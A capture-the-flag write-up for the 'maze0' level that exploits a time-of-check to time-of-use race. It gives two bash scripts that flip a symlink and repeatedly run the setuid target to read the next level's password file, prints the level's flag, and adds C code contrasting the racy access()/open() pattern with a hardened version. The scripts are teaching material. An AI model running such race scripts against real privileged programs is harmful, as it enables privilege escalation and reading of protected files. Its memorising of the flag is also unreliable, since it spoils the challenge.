maze0 | Avishai’s CTF Writeups


In this level we exploit a race condition (time-of-check to time-of-use). The program first checks access to a file, then changes to higher privileges and prints the content of the file. So we point the link at a file readable with maze0 privileges, and before the program opens the file for reading, we switch the link to a file that needs maze1 privileges.

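#!/bin/bash
# link_script.sh: keep flipping the symlink between the maze0 file and the
# maze1 file, so its target can change between the access check and the open.

while true; do
        ln -sf /etc/maze_pass/maze0 /tmp/128ecf542a35ac5270a87dc740918404
        ln -sf /etc/maze_pass/maze1 /tmp/128ecf542a35ac5270a87dc740918404
done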

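#!/bin/bash
# run_script.sh: run the target over and over; cat prints whatever the link
# points to at that moment, when the current user is allowed to read it.

while true; do
        /maze/maze0
        cat /tmp/128ecf542a35ac5270a87dc740918404 2> /dev/null
done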

Then we run both scripts, with the linking script in the background:

./link_script.sh &
./run_script.sh | grep -av "maze0"


Flag: kfL7RRfpkY
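
The check-then-open pattern described at the top of this writeup, next to a hardened version, as an added example (this is not the maze0 source, which the page does not show). The function names are hypothetical, a setuid (not setgid) binary is assumed, and `selfcheck` works on a constructed temp file and symlink.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Racy pattern: access() checks with the REAL uid, open() later runs with the
 * EFFECTIVE uid, and the path is resolved twice. A symlink re-pointed between
 * the two calls makes the check and the use refer to different files. */
int open_racy(const char *path) {
    if (access(path, R_OK) != 0)      /* time of check */
        return -1;
    return open(path, O_RDONLY);      /* time of use */
}

/* Hardened: no separate check. Take on the caller's identity for the open, so
 * the kernel checks permission and opens in one step, and refuse a symlink as
 * the final path component. */
int open_as_caller(const char *path) {
    uid_t privileged = geteuid();
    if (seteuid(getuid()) != 0)
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    int saved = errno;
    if (seteuid(privileged) != 0) {   /* cannot restore: fail closed */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved;
    return fd;
}

/* Constructed self-check: a regular file opens, a symlink to it is refused.
 * Returns 1 when both hold. */
int selfcheck(void) {
    char dir[] = "/tmp/toctou-demo-XXXXXX", file[64], lnk[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(file, sizeof file, "%s/data", dir);
    snprintf(lnk, sizeof lnk, "%s/link", dir);
    int fd = open(file, O_CREAT | O_WRONLY, 0600);
    if (fd < 0 || close(fd) != 0 || symlink(file, lnk) != 0) return 0;
    int got_file = open_as_caller(file);
    int got_link = open_as_caller(lnk);
    if (got_file >= 0) close(got_file);
    unlink(lnk); unlink(file); rmdir(dir);
    return got_file >= 0 && got_link == -1;
}

int main(void) { return selfcheck() ? 0 : 1; }
```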